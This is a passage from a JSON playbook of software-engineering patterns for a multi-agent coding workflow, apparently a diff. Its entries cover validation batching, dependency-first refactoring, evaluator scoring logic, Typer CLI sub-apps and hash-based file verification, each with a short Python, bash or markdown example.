context\"\"\"\n # Orchestrator has full workflow context + all iteration history\n intervention_context = {\n \"subtask\": subtask,\n \"iteration_history\": subtask.feedback_history,\n \"last_monitor_feedback\": last_feedback,\n \"workflow_context\": self.workflow.get_accumulated_lessons()\n }\n \n # Orchestrator applies fix directly (not via Actor)\n fixed_result = orchestrator.apply_direct_fix(intervention_context)\n \n # Verify fix with Monitor\n verification = monitor.evaluate(fixed_result)\n if not verification.passed:\n raise OrchestrationError(\n f\"Orchestrator intervention failed for {subtask.id}. \"\n f\"Manual review required.\"\n )\n \n return fixed_result\n```", - "tags": [ - "orchestrator", - "iteration-limit", - "intervention", - "circuit-breaker", - "actor", - "monitor", - "feedback-loop", - "map-framework", - "python" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-21T10:08:01.014430Z", - "related_bullets": [ - "arch-0005", - "impl-0002", - "test-0001" - ] - }, - { - "id": "arch-0007", - "content": "Comprehensive Validation Pattern for Multi-Agent Workflows: When implementing validation agents (Monitor, Reviewer, Checker), use comprehensive validation with batched feedback instead of sequential validation with early exit. Run ALL independent validation checks in one pass (duplicates, schema, structure, logic), accumulate ALL issues, report them together. This prevents iteration explosion - with N independent issues, comprehensive validation requires 1 Actor-Validator cycle vs sequential validation requiring N cycles. Only use early exit when errors are truly dependent (syntax errors prevent semantic checks). Pattern proven: 4 duplicate issues fixed in 1 iteration with comprehensive validation vs 4 iterations with sequential validation.", - "code_example": "```python\n# ❌ SEQUENTIAL VALIDATION - iteration explosion\ndef validate_sequential(output):\n # Check duplicates first\n duplicates = find_duplicates(output)\n if duplicates:\n return ValidationError(f\"Found duplicates: {duplicates}\")\n \n # Never reaches other checks if duplicates exist\n schema_errors = validate_schema(output)\n if schema_errors:\n return ValidationError(f\"Schema errors: {schema_errors}\")\n \n return ValidationSuccess()\n# Result: 4 independent issues = 4 Actor-Monitor cycles\n\n# ✅ COMPREHENSIVE VALIDATION - batched feedback\ndef validate_comprehensive(output):\n issues = [] # Accumulate ALL issues\n \n # Run ALL independent checks\n duplicates = find_duplicates(output)\n if duplicates:\n issues.append(f\"Duplicates: {duplicates}\")\n \n schema_errors = validate_schema(output)\n if schema_errors:\n issues.append(f\"Schema errors: {schema_errors}\")\n \n structure_errors = validate_structure(output)\n if structure_errors:\n issues.append(f\"Structure errors: {structure_errors}\")\n \n logic_errors = validate_logic(output)\n if logic_errors:\n issues.append(f\"Logic errors: {logic_errors}\")\n \n # Report ALL issues together\n if issues:\n return ValidationError(\"\\n\".join(issues))\n \n return ValidationSuccess()\n# Result: 4 independent issues = 1 Actor-Monitor cycle\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-21T09:04:13.347892Z", - "last_used_at": "2025-10-21T09:04:13.348115Z", - "related_bullets": [ - "arch-0006", - "impl-0009" - ], - "tags": [ - "validation", - "comprehensive", - "batched-feedback", - "iteration-explosion", - "multi-agent", - "monitor", - "architecture", - "python", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0008", - "content": "Dependency-First Structural Refactoring: Before moving files or reorganizing packages, ALWAYS run comprehensive dependency analysis to distinguish code dependencies (high-risk, require implementation changes) from reference dependencies (low-risk, mechanical path updates). Code dependencies include imports, function calls, inheritance relationships. Reference dependencies include documentation links, configuration paths, test fixtures. Use grep/ripgrep to search for file/module names across codebase. Classify each match as code vs reference. Only proceed with file movement after mapping ALL dependencies and planning their updates. Moving files without dependency analysis causes cascading import failures and broken references requiring emergency rollback.", - "code_example": "```bash\n# ❌ DANGEROUS - Move files without dependency analysis\ngit mv src/old_location/module.py src/new_location/\n# Result: All imports break, tests fail, production risk\n\n# ✅ SAFE - Dependency analysis first\n# Step 1: Find ALL references to file being moved\nrg --type py 'from old_location import|import old_location' .\nrg --type md 'old_location' docs/\nrg 'old_location' config/ tests/\n\n# Step 2: Classify dependencies\n# CODE (high-risk): src/main.py:15 \"from old_location import module\"\n# REFERENCE (low-risk): docs/api.md:45 \"See old_location/module.py\"\n\n# Step 3: Plan updates\n# - Code deps: Update imports in 5 files (src/main.py, tests/test_*.py)\n# - Reference deps: Update 3 doc files, 1 config path\n\n# Step 4: Execute with verification\ngit mv src/old_location/module.py src/new_location/\n# Update code dependencies first (critical path)\n# Update reference dependencies second (documentation)\npytest # Verify no broken imports\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:32:16.485291Z", - "last_used_at": "2025-10-25T13:32:16.485301Z", - "related_bullets": [ - "arch-0002", - "impl-0008" - ], - "tags": [ - "refactoring", - "dependencies", - "file-movement", - "risk-mitigation", - "bash", - "grep", - "structural-change" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0009", - "content": "Agent Template Evolution Strategy: When enhancing agent templates with new fields/sections, insert new content between existing structural markers to preserve readability and maintain logical flow. Template structure order: Introduction → Core Instructions → Decision Frameworks → New Fields/Extensions → Examples → Checklist. Insert new fields AFTER closing tag but BEFORE opening tag. Rationale: Decision frameworks are conceptual foundation (theory), examples show full integration (practice), new fields bridge the gap (application). This placement allows examples to demonstrate new fields in context without requiring readers to scroll back to field definitions.", - "code_example": "```markdown\n# ❌ INCORRECT - New field appended at end (after examples)\n\n[Existing examples]\n\n\n### test_strategy ← Hard to integrate into examples\n[Field documentation]\n\n# ✅ CORRECT - New field between frameworks and examples\n ← Conceptual foundation ends\n\n### test_strategy ← Insert new capabilities here\n[Field documentation]\n**Test Layer Decision Table**: [Table]\n\n ← Full integration examples start\n[Examples now show test_strategy in context]\n\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T16:17:18.196289Z", - "last_used_at": null, - "related_to": [ - "arch-0004", - "doc-0020" - ], - "tags": [ - "agent-templates", - "architecture", - "backward-compatibility", - "template-design", - "maintainability" - ] - }, - { - "id": "arch-0010", - "content": "TaskDecomposer 3-Subtask Rule for Standalone Tools: When creating standalone tools/scripts/utilities (validators, generators, analyzers), decompose into 3 distinct subtasks: (1) Implementation (core logic, algorithms), (2) Testing (unit tests, edge cases), (3) Integration (CLI wiring, CI/CD hooks, documentation). Prevents 'built but not wired up' anti-pattern where excellent code achieves 9/10 quality but 4/10 completeness due to missing integration. Merged subtasks hide integration gaps until Predictor reveals 14+ files needing updates. Pattern proven: validate-dependencies.py scored 9/10 code quality but 4/10 completeness - implementation excellent, integration missing (CLI entry point, CI workflow integration, CONTRIBUTING.md documentation). Three-subtask decomposition surfaces integration requirements early, enables parallel Monitor validation (each subtask validates independently), reduces Predictor surprise (integration gaps discovered in planning, not execution).", - "code_example": "```python\n# ✅ GOOD - 3-Subtask Decomposition for Standalone Tool\n\n# Subtask 1: Implementation (validate-dependencies.py core logic)\nclass DependencyValidator:\n def validate_imports(self, file_path: str) -> ValidationResult:\n \"\"\"Core validation logic - no CLI, no integration\"\"\"\n imports = self.extract_imports(file_path)\n missing = self.check_against_pyproject(imports)\n return ValidationResult(missing_deps=missing)\n\n# Subtask 2: Testing (test_validate_dependencies.py)\ndef test_validator_detects_missing():\n \"\"\"Unit tests for core logic\"\"\"\n validator = DependencyValidator()\n result = validator.validate_imports('sample.py')\n assert 'pytest' in result.missing_deps\n\n# Subtask 3: Integration (wiring up tool)\n# A. CLI entry point (pyproject.toml)\n[project.scripts]\nvalidate-deps = \"mapify_cli.tools.validate_dependencies:main\"\n\n# B. CI/CD workflow (.github/workflows/validate.yml)\njobs:\n validate-dependencies:\n runs-on: ubuntu-latest\n steps:\n - run: python -m mapify_cli.tools.validate_dependencies\n\n# C. Documentation (CONTRIBUTING.md)\n## Dependency Validation\nRun `validate-deps` before committing to detect missing dependencies.\n\n# ❌ BAD - Merged Subtask (Implementation + Testing + Integration)\n# Result: 9/10 code quality (implementation works), 4/10 completeness\n# (CLI not wired, CI not updated, docs missing), 14 files needing updates\n# discovered only after Predictor analysis\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T07:32:38.306390Z", - "last_used_at": "2025-10-27T07:32:38.306390Z", - "related_bullets": [ - "arch-0002" - ], - "tags": [ - "taskdecomposer", - "subtask-planning", - "standalone-tools", - "integration", - "map-framework", - "completeness", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0011", - "content": "Monitor vs Predictor Division of Labor: Monitor validates implementation-level correctness (code quality, security, functionality within files), Predictor validates system-level integration (cross-file dependencies, CI/CD impact, documentation consistency, 10+ file ripple effects). Do NOT expect Monitor to catch integration gaps - that is Predictor's job. Pattern proven: validate-dependencies.py Monitor found 3 implementation issues (missing error handling, incorrect logic, security gaps), Predictor found 14 files needing updates (CLI integration, CI workflows, documentation). Both agents correctly fulfilled their roles. Monitor answers: 'Does this code work correctly in isolation?' Predictor answers: 'Does this change integrate correctly with the system?' Overlap causes inefficiency (both agents check same thing) or gaps (both assume other will check). Clear division enables parallel validation and reduces iteration loops. TERMINOLOGY: Monitor validates 'functionally_correct' (works as specified), Evaluator validates 'production_ready' (deployment-worthy). Monitor approval ≠ Evaluator approval - different quality dimensions.", - "code_example": "```python\n# ✅ CLEAR Division of Labor\n\nclass MonitorAgent:\n \"\"\"Implementation-level validation (single file, code correctness)\"\"\"\n def validate(self, actor_output):\n checks = [\n self.check_code_syntax(), # Does code compile?\n self.check_error_handling(), # Exceptions handled?\n self.check_security_patterns(), # SQL injection, XSS?\n self.check_code_quality(), # Complexity, naming?\n self.check_test_coverage(), # Tests exist?\n ]\n # ✅ Monitor FOUND: 3 issues in validate-dependencies.py logic\n # ✅ Monitor IGNORES: Whether tool is wired into CLI/CI\n return ValidationResult(issues=checks)\n\nclass PredictorAgent:\n \"\"\"System-level validation (cross-file, integration impact)\"\"\"\n def analyze_impact(self, actor_output):\n impacts = [\n self.find_callers(), # Which files call this?\n self.check_cli_integration(), # Entry point exists?\n self.check_ci_workflows(), # CI runs this tool?\n self.check_documentation(), # CONTRIBUTING.md updated?\n self.estimate_ripple_effects(), # How many files affected?\n ]\n # ✅ Predictor FOUND: 14 files need updates (integration gaps)\n # ✅ Predictor IGNORES: Whether code logic is correct\n return ImpactAnalysis(affected_files=impacts)\n\n# ❌ BAD - Monitor trying to do Predictor's job\nclass MonitorAgent:\n def validate(self, actor_output):\n # ... code quality checks ...\n self.check_cli_integration() # ❌ WRONG - this is Predictor's job\n # Result: Monitor rejects for missing CLI integration\n # But implementation might be correct!\n # Wastes iteration loop on wrong validation layer\n\n# Example from validate-dependencies.py:\n# Monitor: 3 implementation issues (logic, error handling) ✅\n# Predictor: 14 integration issues (CLI, CI, docs) ✅\n# Clear division prevented role confusion and parallel validation\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T07:32:38.306390Z", - "last_used_at": "2025-10-27T11:48:26.144410Z", - "related_bullets": [ - "arch-0001", - "arch-0002" - ], - "tags": [ - "monitor", - "predictor", - "validation", - "division-of-labor", - "implementation", - "integration", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0012", - "content": "Evaluator Context-Dependent Threshold Logic: Do NOT use fixed approval threshold (e.g., >=8.0 approve, <8.0 reject). Distinguish decomposition issues (low completeness due to missing subtasks, integration gaps) vs implementation issues (bugs, security flaws, incorrect logic). For decomposition issues: PROCEED if correctness >=8.0 even if overall score is 7.0-8.0, because problem is in task planning (Orchestrator/TaskDecomposer), not Actor execution. For implementation issues: REJECT if correctness <8.0 regardless of overall score, because Actor must fix bugs before proceeding. Context-dependent thresholds prevent two failure modes: (1) Rejecting excellent implementations due to planning deficiencies (wastes Actor's work), (2) Approving buggy implementations because completeness is high (propagates defects). Pattern proven: validate-dependencies.py scored 7.85/10 overall (9.0/10 correctness, 4.0/10 completeness) → PROCEED decision correct because 14 missing files are decomposition issue, not implementation defect. Fixed threshold would have rejected 9/10 quality code.", - "code_example": "```python\n# ✅ GOOD - Context-Dependent Evaluator Logic\n\nclass EvaluatorAgent:\n CORRECTNESS_THRESHOLD = 8.0 # Implementation quality gate\n OVERALL_THRESHOLD = 8.0 # Ideal target\n \n def evaluate(self, actor_output, monitor_feedback, predictor_impact):\n scores = self.calculate_scores(actor_output)\n \n # Identify issue type\n issue_type = self.classify_issue(scores, predictor_impact)\n \n if issue_type == \"DECOMPOSITION\":\n # Low completeness due to missing subtasks/integration\n # This is Orchestrator/TaskDecomposer issue, not Actor fault\n if scores.correctness >= self.CORRECTNESS_THRESHOLD:\n return Decision(\n approved=True,\n reason=f\"PROCEED: Correctness {scores.correctness}/10 meets threshold despite overall {scores.overall}/10. Completeness gap ({scores.completeness}/10) is decomposition issue - Actor implemented assigned scope correctly. Predictor identified {predictor_impact.affected_files_count} files needing updates, indicating subtask should have been split (Implementation + Integration).\"\n )\n \n elif issue_type == \"IMPLEMENTATION\":\n # Bugs, security flaws, incorrect logic\n # Actor must fix before proceeding\n if scores.correctness < self.CORRECTNESS_THRESHOLD:\n return Decision(\n approved=False,\n reason=f\"REJECT: Correctness {scores.correctness}/10 below threshold. Implementation has bugs/security issues that Actor must fix. Completeness ({scores.completeness}/10) is irrelevant until code correctness is achieved.\"\n )\n \n # Happy path: both correctness and overall meet threshold\n if scores.overall >= self.OVERALL_THRESHOLD:\n return Decision(approved=True, reason=\"All metrics meet thresholds\")\n \n def classify_issue(self, scores, predictor_impact):\n \"\"\"Distinguish decomposition vs implementation issues\"\"\"\n # Decomposition issue signals:\n # - High correctness (>=8.0) but low completeness (<6.0)\n # - Predictor found 10+ files needing updates (integration gaps)\n # - Monitor found few/no implementation defects\n if (scores.correctness >= 8.0 and \n scores.completeness < 6.0 and \n predictor_impact.affected_files_count >= 10):\n return \"DECOMPOSITION\"\n \n # Implementation issue signals:\n # - Low correctness (<8.0)\n # - Monitor found bugs, security issues, logic errors\n if scores.correctness < 8.0:\n return \"IMPLEMENTATION\"\n \n return \"UNKNOWN\"\n\n# ❌ BAD - Fixed Threshold (ignores context)\nif overall_score < 8.0:\n return Decision(approved=False) # Rejects 7.85 score\n# Result: Excellent 9/10 implementation rejected due to planning deficiency\n# Actor must redo work that was already correct\n\n# Real Example: validate-dependencies.py\n# Overall: 7.85/10 (below fixed 8.0 threshold)\n# Correctness: 9.0/10 (excellent implementation)\n# Completeness: 4.0/10 (missing 14 integration files)\n# Fixed threshold: REJECT ❌ (wastes Actor's correct work)\n# Context-aware: PROCEED ✅ (recognizes decomposition issue)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T07:32:38.306390Z", - "last_used_at": "2025-10-27T07:32:38.306390Z", - "related_bullets": [ - "arch-0001" - ], - "tags": [ - "evaluator", - "threshold", - "approval-logic", - "context-dependent", - "decomposition", - "correctness", - "completeness", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0013", - "content": "Context-Dependent Completeness Scoring in Evaluator: Only penalize missing elements that fall WITHIN current subtask's scope. If element is explicitly handled by different subtask (e.g., documentation in Subtask 7, integration in Subtask 8), do NOT penalize completeness in current subtask. Respects MAP decomposition strategy where workflow intentionally splits concerns across subtasks. Pattern proven: Subtask 6 missing documentation → correct score 9/10 completeness (not 4/10) because Subtask 7 explicitly handles docs. Prevents 'penalize Actor for Orchestrator's decomposition decisions' anti-pattern. Evaluator must examine full task plan to determine scope boundaries: if task plan shows 'Subtask 6: Implementation, Subtask 7: Documentation', then Subtask 6 gets zero documentation penalty. Cross-subtask dependencies are Orchestrator's responsibility, not Actor's failure. This pattern distinguishes from arch-0012 (decomposition vs implementation issues) - arch-0012 focuses on correctness threshold logic, this pattern focuses on completeness scoring boundaries.", - "code_example": "```python\n# ✅ GOOD - Context-Aware Completeness\nclass EvaluatorAgent:\n def calculate_completeness(self, actor_output, subtask, task_plan):\n delegated = task_plan.get_future_responsibilities()\n missing_in_scope = [\n el for el in self.REQUIRED \n if el not in actor_output and el not in delegated\n ]\n return 10 - len(missing_in_scope)\n\n# Example: Subtask 6 missing docs\n# docs in Subtask 7 → completeness=9/10 (not 4/10)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:48:26.144410Z", - "last_used_at": "2025-10-27T11:48:26.144410Z", - "related_bullets": [ - "arch-0012", - "arch-0002", - "arch-0010" - ], - "tags": [ - "Evaluator", - "completeness", - "scoring", - "subtask-scope", - "decomposition", - "MAP" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0014", - "content": "Typer Sub-App Integration Pattern for CLI Tools: When adding new CLI commands to existing Typer application, use lazy-import sub-app pattern to isolate functionality and improve startup performance. Pattern: (1) Create dedicated sub-app in module (app = typer.Typer()), (2) Define commands on sub-app (@app.command()), (3) Import sub-app lazily in main CLI module, (4) Register with main app (main_app.add_typer(sub_app, name='command-group')). Benefits: 9/10 architectural fit (proven in recitation_app, playbook_app, validate_app), command isolation (dependencies loaded only when invoked), consistent CLI structure (grouped commands), independent testing (mock sub-app without main CLI). Avoid tight coupling: sub-app imports should not depend on main app internals.", - "code_example": "```python\n# ❌ BAD - Direct command registration (tight coupling)\n# main.py\nfrom mapify_cli import app # Main Typer app\nfrom mapify_cli.tools.validate_dependencies import validate_imports\n\n@app.command('validate-deps')\ndef validate_deps_cmd(file: str):\n \"\"\"Tightly coupled to main app\"\"\"\n result = validate_imports(file)\n print(result)\n# Problem: All tool imports loaded at CLI startup, no isolation\n\n# ✅ GOOD - Sub-App Pattern (isolation + lazy import)\n# mapify_cli/tools/validate_app.py\nimport typer\nfrom mapify_cli.tools.validate_dependencies import DependencyValidator\n\napp = typer.Typer(help=\"Dependency validation tools\")\n\n@app.command('validate-deps')\ndef validate_deps(\n file: str = typer.Argument(..., help=\"Python file to validate\")\n):\n \"\"\"Validate imports against pyproject.toml\"\"\"\n validator = DependencyValidator()\n result = validator.validate_imports(file)\n if result.missing_deps:\n print(f\"Missing dependencies: {result.missing_deps}\")\n raise typer.Exit(code=1)\n print(\"All dependencies satisfied\")\n\n# mapify_cli/main.py (main CLI app)\nimport typer\n\napp = typer.Typer()\n\n# Lazy import sub-app only when validate command invoked\ntry:\n from mapify_cli.tools import validate_app\n app.add_typer(validate_app.app, name='validate')\nexcept ImportError:\n pass # Graceful degradation if tools not installed\n\nif __name__ == '__main__':\n app()\n\n# Result: Users run 'mapify validate validate-deps file.py'\n# Benefits: Isolation (validate_app testable independently),\n# Performance (lazy import), Consistency (follows recitation_app pattern)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:14:58.063144+00:00", - "last_used_at": "2025-10-27T11:14:58.063144+00:00", - "related_bullets": [ - "arch-0010", - "impl-0008" - ], - "tags": [ - "typer", - "cli", - "sub-app", - "architecture", - "lazy-import", - "isolation", - "python", - "performance" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "IMPLEMENTATION_PATTERNS": { - "description": "Code patterns and idioms for common development tasks", - "bullets": [ - { - "id": "impl-0001", - "content": "Multi-Agent Workflow Documentation: When documenting analysis findings in multi-agent systems, always include detailed implementation plans with concrete before/after examples, not just abstract findings. Monitors/Evaluators need actionable plans to verify completion. Structure: (1) Current state with file paths and line numbers, (2) Proposed changes with specific code modifications, (3) Verification criteria. This prevents 'findings without fixes' anti-pattern common in AI-assisted workflows.", - "code_example": "```python\n# ❌ INSUFFICIENT - Just findings\nanalysis = {\n \"findings\": [\"Workflow logging incomplete\"],\n \"recommendation\": \"Add logging\"\n}\n\n# ✅ ACTIONABLE - Implementation plan\nanalysis = {\n \"findings\": [\"Workflow logging incomplete in orchestrator.py:45-67\"],\n \"implementation_plan\": {\n \"before\": \"# No logging in execute_subtask()\\nresult = actor.execute(task)\",\n \"after\": \"logger.info(f'Executing subtask {task.id}')\\nresult = actor.execute(task)\\nlogger.info(f'Completed subtask {task.id}')\",\n \"files\": [\"src/orchestrator.py\"],\n \"verification\": \"Check logs contain 'Executing subtask' and 'Completed subtask' entries\"\n }\n}\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T12:26:06.880415Z", - "last_used_at": "2025-10-18T12:26:06.880415Z", - "related_bullets": [], - "tags": [ - "multi-agent", - "workflow", - "documentation", - "python", - "map-framework", - "implementation-plan" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0002", - "content": "Inter-Subtask Learning Propagation: When workflow executes similar sequential subtasks (e.g., Subtask 1 analysis, Subtask 2 analysis), extract Monitor feedback from first subtask as preventive checklist for subsequent subtasks. This reduces iteration count by preemptively addressing common gaps. Extract task-type-specific lessons (e.g., 'analysis must include implementation plan'), not implementation-specific fixes (e.g., 'add logging to orchestrator.py line 45'). Pattern proven: Subtask 1 required 2 iterations to pass Monitor, Subtask 2 required only 1 iteration when checklist applied.", - "code_example": "```python\n# ❌ WITHOUT Learning Propagation\ndef execute_sequential_subtasks(subtasks):\n for subtask in subtasks:\n result = actor.execute(subtask) # Each subtask repeats same mistakes\n feedback = monitor.evaluate(result)\n # No cross-subtask learning\n\n# ✅ WITH Learning Propagation\ndef execute_sequential_subtasks(subtasks):\n workflow_lessons = [] # Accumulate lessons\n \n for i, subtask in enumerate(subtasks):\n # Apply lessons from previous similar subtasks\n if workflow_lessons:\n subtask.context['preventive_checklist'] = workflow_lessons\n \n result = actor.execute(subtask)\n feedback = monitor.evaluate(result)\n \n # Extract reusable lessons (not implementation-specific)\n if feedback.gaps:\n lesson = extract_pattern(feedback.gaps) # e.g., 'include implementation plan'\n workflow_lessons.append(lesson)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T15:42:00.000000Z", - "last_used_at": "2025-10-18T15:42:00.000000Z", - "related_bullets": [ - "test-0001", - "impl-0001" - ], - "tags": [ - "multi-agent", - "workflow", - "learning", - "iteration-reduction", - "map-framework", - "python", - "feedback-propagation" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0003", - "content": "Executable Specification for Code Transformations: When analyzing code requiring mechanical transformations (refactoring, optimization, style fixes), provide executable specifications with exact line ranges and verbatim current/optimized text. Structure: (1) File path + exact line range (e.g., lines 45-67), (2) Current text verbatim from those lines, (3) Optimized text showing exact replacement, (4) Transformation rule applied. This eliminates interpretation ambiguity between analyst and implementer. Vague analysis ('improve error handling') causes iteration loops. Detailed specification enables single-iteration implementation. Proven: Subtask 1 with detailed spec → Subtask 3 implemented in 1 iteration.", - "code_example": "```python\n# ❌ VAGUE - Causes iterations\nanalysis = {\n \"finding\": \"Error handling in parser.py needs improvement\",\n \"recommendation\": \"Add try-catch blocks\"\n}\n\n# ✅ EXECUTABLE SPECIFICATION - Single iteration\nanalysis = {\n \"file\": \"/absolute/path/parser.py\",\n \"line_range\": \"45-52\",\n \"current_text\": \"\"\"def parse_config(file_path):\n data = json.load(open(file_path))\n return Config(data)\"\"\",\n \"optimized_text\": \"\"\"def parse_config(file_path):\n try:\n with open(file_path) as f:\n data = json.load(f)\n return Config(data)\n except (FileNotFoundError, json.JSONDecodeError) as e:\n logger.error(f'Config parse failed: {e}')\n raise ConfigError(f'Invalid config {file_path}') from e\"\"\",\n \"transformation_rule\": \"Add context manager for file handling + explicit exception handling with logging\"\n}\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-18T16:05:00.000000Z", - "last_used_at": "2025-10-18T18:00:00.000000Z", - "related_bullets": [ - "impl-0001", - "qual-0001" - ], - "tags": [ - "transformation", - "specification", - "refactoring", - "analysis", - "implementation-plan", - "map-framework", - "python", - "code-quality" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0004", - "content": "Bounded Optimization Specifications: When specifying optimization targets (e.g., token compression), define BOTH target floor (minimum acceptable) AND ceiling (maximum safe compression). Structure: (1) Target floor with rationale (e.g., '50% compression' based on efficiency goals), (2) Ceiling as % over target (e.g., '100-150% over target' = safe zone, '>200% over' = danger zone where over-optimization risks quality). Distinguish template purposes: teaching templates (require concrete code examples) need stricter ceilings (~150%) to preserve pedagogical value, validation templates (allow summaries) permit looser ceilings (~200%) for efficiency. Safe optimization zone: 100-150% over target. Danger zone: >200% where compression compromises content value.", - "code_example": "```python\n# ❌ UNBOUNDED - Risks over-optimization\noptimization_spec = {\n \"target\": \"Reduce tokens by 50%\",\n \"approach\": \"Remove unnecessary verbosity\"\n}\n# Result: Unconstrained optimization may remove critical details\n\n# ✅ BOUNDED - Safe optimization corridor\noptimization_spec = {\n \"target_floor\": \"50% token reduction (efficiency goal)\",\n \"ceiling\": \"150% over target = 75% max reduction\",\n \"safe_zone\": \"50-75% reduction acceptable\",\n \"danger_zone\": \">75% reduction risks content loss\",\n \"template_purpose\": \"teaching\", # vs 'validation'\n \"purpose_constraints\": {\n \"teaching\": \"Preserve concrete code examples, max 150% ceiling\",\n \"validation\": \"Summaries acceptable, max 200% ceiling\"\n },\n \"rationale\": \"Teaching templates need pedagogical completeness, validation templates optimize for efficiency\"\n}\n\n# Evidence-based thresholds from workflow:\n# - Monitor template 135% praised (validation purpose, within safe zone)\n# - Evaluator template 238% concerns (teaching purpose, exceeded safe ceiling)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T18:00:00.000000Z", - "last_used_at": "2025-10-18T18:00:00.000000Z", - "related_bullets": [ - "impl-0003", - "qual-0001" - ], - "tags": [ - "optimization", - "specification", - "bounded", - "compression", - "template", - "map-framework", - "python", - "quality-gate" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0005", - "content": "File Synchronization with Cryptographic Verification: When verifying file equivalence across directories (template sync, config propagation, backup validation), always use SHA256 or stronger cryptographic hashes. Hash-based verification provides mathematical certainty superior to manual diff inspection (error-prone), timestamp comparison (git resets timestamps), or file size checks (can coincidentally match). Generate hash manifests for both source and target directories, then compare manifests. This approach is automation-friendly, scriptable, and provides binary identical/different decisions. Always perform complete discovery before modification: identify missing files, divergent files, AND orphaned artifacts in a single pass, then apply fixes as an atomic batch.", - "code_example": "```bash\n# ❌ INCORRECT - manual diff (error-prone, doesn't scale)\nfor f in *.md; do diff source/$f target/$f; done\n\n# ❌ INCORRECT - timestamp comparison (unreliable with git)\nfind source/ -newer target/\n\n# ✅ CORRECT - SHA256 hash comparison\n(cd source && shasum -a 256 *.md) | sort > source_hashes.txt\n(cd target && shasum -a 256 *.md) | sort > target_hashes.txt\ndiff source_hashes.txt target_hashes.txt\n\n# ✅ CORRECT - Complete discovery\ncomm -23 <(cd source && ls | sort) <(cd target && ls | sort) # Missing\ncomm -13 <(cd source && ls | sort) <(cd target && ls | sort) # Orphaned\n\n# Apply fixes, then re-verify with hashes\ncp source/missing.md target/\n(cd target && shasum -a 256 *.md) | diff source_hashes.txt -\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T10:00:56.751820Z", - "last_used_at": "2025-10-20T10:00:56.751828Z", - "related_bullets": [ - "impl-0003" - ], - "tags": [ - "file-sync", - "cryptographic-hash", - "sha256", - "verification", - "template", - "devops", - "bash", - "infrastructure" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0006", - "content": "Behavior Matrix Documentation: When documenting system behavior across multiple states, create markdown tables showing State × Operation → Outcome. This format provides business stakeholder visibility (non-technical readable) while serving as specification for technical implementation. Rows = system states (e.g., 'No plan exists', 'Incomplete plan exists'), Columns = operations (GET, POST, DELETE), Cells = outcomes (status codes, state transitions). Include separate column for 'Expected Behavior' when investigating bugs (highlights discrepancies). Pattern scales: 3 states × 4 operations = 12 cell matrix vs 12 separate text descriptions. Use tables in PRs, API docs, and requirements specifications.", - "code_example": "```markdown\n\nWhen no plan exists, GET returns 404 and POST creates new plan. When incomplete plan exists, GET returns the plan and POST replaces it. When complete plan exists, GET returns it and POST returns 409 conflict.\n\n\n## Plan API Behavior Matrix\n\n| System State | GET /plans/{user_id} | POST /plans/{user_id} | DELETE /plans/{user_id} | Expected Behavior |\n|--------------|----------------------|------------------------|-------------------------|-------------------|\n| No plan exists | 404 Not Found | 201 Created (new plan) | 404 Not Found | ✅ Correct |\n| Incomplete plan exists | 200 OK (incomplete plan) | 201 Created (replaces old) | 204 No Content | ✅ Correct |\n| Complete plan exists | 200 OK (complete plan) | 409 Conflict | 204 No Content | ⚠️ BUG: POST should return 409, returns 201 |\n| Multiple plans exist (invalid) | 500 Internal Error | 500 Internal Error | 500 Internal Error | ⚠️ BUG: Should prevent this state |\n\n**Notes:**\n- Incomplete plan: `complete` field = `false`\n- Complete plan: `complete` field = `true` \n- Multiple plans state should be prevented by unique constraint (bug #1235)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T13:45:00.000000Z", - "last_used_at": "2025-10-20T13:45:00.000000Z", - "related_bullets": [ - "impl-0001", - "qual-0001" - ], - "tags": [ - "documentation", - "behavior-matrix", - "api", - "specification", - "markdown", - "table", - "stakeholder", - "testing" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0007", - "content": "Ambiguity Resolution Documentation: When technical terms have multiple meanings in your domain (e.g., 'plan' = data structure vs 'plan' = user's travel itinerary), explicitly document all definitions at the start of specifications. Use glossary format: Term → Definition + Context. This prevents miscommunication between business stakeholders (domain meaning) and engineers (technical meaning). Pattern proven: without glossary, 'plan is incomplete' has 2 interpretations (missing data fields vs user hasn't finalized travel). Include glossary in API docs, requirements, and exploratory test reports. Update glossary when discovering new ambiguous terms during investigation.", - "code_example": "```markdown\n\n## Plan API Testing Results\nThe plan endpoint has issues when plan is incomplete.\n\n\n\n## Glossary\n\n**Plan (data structure)**: JSON object in database with fields `user_id`, `destination`, `dates`, `complete` (boolean). Technical representation.\n\n**Plan (user intent)**: User's travel itinerary from business perspective. Considered \"incomplete\" if user hasn't finalized decisions (complete=false), \"complete\" if ready to book (complete=true).\n\n**Incomplete plan**: Ambiguous term. In this document:\n- **Technical meaning**: Plan object where `complete` field = `false`\n- **Business meaning**: User 